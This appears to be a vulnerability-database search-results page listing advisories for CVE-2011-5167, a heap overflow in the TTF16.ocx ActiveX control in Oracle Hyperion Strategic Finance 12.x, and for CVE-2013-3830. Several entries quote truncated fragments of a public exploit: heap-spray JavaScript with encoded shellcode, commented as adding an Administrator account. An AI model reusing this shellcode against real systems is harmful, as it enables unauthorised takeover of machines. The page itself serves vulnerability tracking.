13 matches found
Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow
No description provided by source. !-- Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16 6.3.5 Build 1 SetDevNames Remote Heap Overflow poc 99% stable,IE-no-dep. I think this control can be carried by other products, however 6.1 seems not vulnerable A...
CVE-2013-3830
Unspecified vulnerability in the Hyperion Strategic Finance component in Oracle Hyperion 11.1.2.1 and 11.1.2.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server...
CVE-2013-3830
CVE-2013-3830 affects the Oracle Hyperion Hyperion Strategic Finance component (versions 11.1.2.1 and 11.1.2.2 ). It enables remote authenticated users to impact confidentiality , integrity , and availability via unknown vectors related to the Server. The provided documents do not include explici...
CVE-2011-5167
Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control TTF16.ocx 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long string to the DriverName parameter...
Heap overflow
Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control TTF16.ocx 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long string to the DriverName parameter...
CVE-2011-5167
Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control TTF16.ocx 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long string to the DriverName parameter...
CVE-2011-5167
CVE-2011-5167 describes a heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control (TTF16.ocx) version 6.3.5 Build 1 used by Oracle Hyperion Strategic Finance 12.x (and possibly earlier). An attacker could trigger arbitrary code execution by supplying a lo...
Oracle Hyperion Strategic Finance Client ActiveX Control Code Execution
A remote code execution vulnerability has been reported in Oracle Hyperion Strategic Finance client...
Oracle Hyperion Strategic Finance Formula One ActiveX控件"SetDevNames()"
Oracle Hyperion Financial Management是综合性的、可扩展的、基于Web的国际财务集成、报告和分析的解决方案。 Oracle Hyperion Strategic Finance在实现上存在安全漏洞,可被恶意用户利用控制用户系统。 此漏洞源于Formula One ActiveX控件TTF16.ocx的"SetDevNames"方法中的边界错误,通过 "DriverName" 参数中传递的超长字符串可造成堆缓冲区溢出。 Oracle Hyperion Strategic Finance 11.x Oracle Hyperion Strategic...
Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow
Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x heap = new heapLib.ie0x20000; var heapspray = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u494...
Oracle Hyperion Strategic Finance Client 12.x Heap Overflow
var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x heap = new heapLib.ie0x20000; var heapspray = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...
Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow
var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x heap = new heapLib.ie0x20000; var heapspray = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...
Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook
Exploit for windows platform in category remote exploits var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x heap = new heapLib.ie0x20000; var heapspray = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu...